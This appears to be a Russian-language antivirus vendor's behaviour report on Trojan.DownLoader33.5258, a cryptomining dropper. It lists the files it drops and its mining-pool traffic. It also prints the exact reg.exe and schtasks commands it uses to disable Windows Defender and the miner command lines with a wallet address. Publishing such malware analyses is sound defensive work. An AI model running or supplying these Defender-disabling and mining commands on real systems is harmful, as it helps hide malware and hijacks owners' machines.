Trojan.DownLoader33.5258

Техническая информация

Вредоносные функции

Для затруднения выявления своего присутствия в системе

блокирует запуск следующих системных утилит:

Системный антивирус (Защитник Windows)

Изменения в файловой системе

Создает следующие файлы

%TEMP%\8e96.tmp\8e97.tmp\8e98.vbs
%APPDATA%\cpuminer-aes-sse42.exe
%APPDATA%\cpuminer-avx.exe
%APPDATA%\cpuminer-avx2.exe
%APPDATA%\cpuminer-avx512.exe
%APPDATA%\cpuminer-sse2.exe
%APPDATA%\cpuminer-zen.exe
%APPDATA%\executar.bat
%APPDATA%\libcrypto-1_1-x64.dll
%APPDATA%\libcurl-4.dll
%APPDATA%\libgcc_s_seh-1.dll
%APPDATA%\libstdc++-6.dll
%APPDATA%\libwinpthread-1.dll
%APPDATA%\pdfb.vbs
%APPDATA%\zlib1.dll

Удаляет следующие файлы

%TEMP%\8e96.tmp\8e97.tmp\8e98.vbs

Сетевая активность

TCP

'ye#####t.mine.zpool.ca':6233

UDP

DNS ASK ye#####t.mine.zpool.ca

Другое

Создает и запускает на исполнение

'<SYSTEM32>\wscript.exe' %TEMP%\8E96.tmp\8E97.tmp\8E98.vbs //Nologo
'%APPDATA%\cpuminer-zen.exe' -a yescrypt -o stratum+tcp://yescrypt.mine.zpool.ca:6233 -u 3PHvGPrC4UUnbiGgvnLXvm4VPpkMsBqjq3d -p c=BCH
'%APPDATA%\cpuminer-sse2.exe' -a yescrypt -o stratum+tcp://yescrypt.mine.zpool.ca:6233 -u 3PHvGPrC4UUnbiGgvnLXvm4VPpkMsBqjq3d -p c=BCH
'<SYSTEM32>\wscript.exe' %TEMP%\8E96.tmp\8E97.tmp\8E98.vbs //Nologo' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%APPDATA%\EXECUTAR.bat" "' (со скрытым окном)

Запускает на исполнение

'<SYSTEM32>\cmd.exe' /c ""%APPDATA%\EXECUTAR.bat" "
'<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
'<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
'<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
'<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
'<SYSTEM32>\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
'<SYSTEM32>\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
'<SYSTEM32>\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
'<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
'<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
'<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
'<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
'<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
'<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
'<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
'<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
'<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
'<SYSTEM32>\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
'<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
'<SYSTEM32>\timeout.exe' 5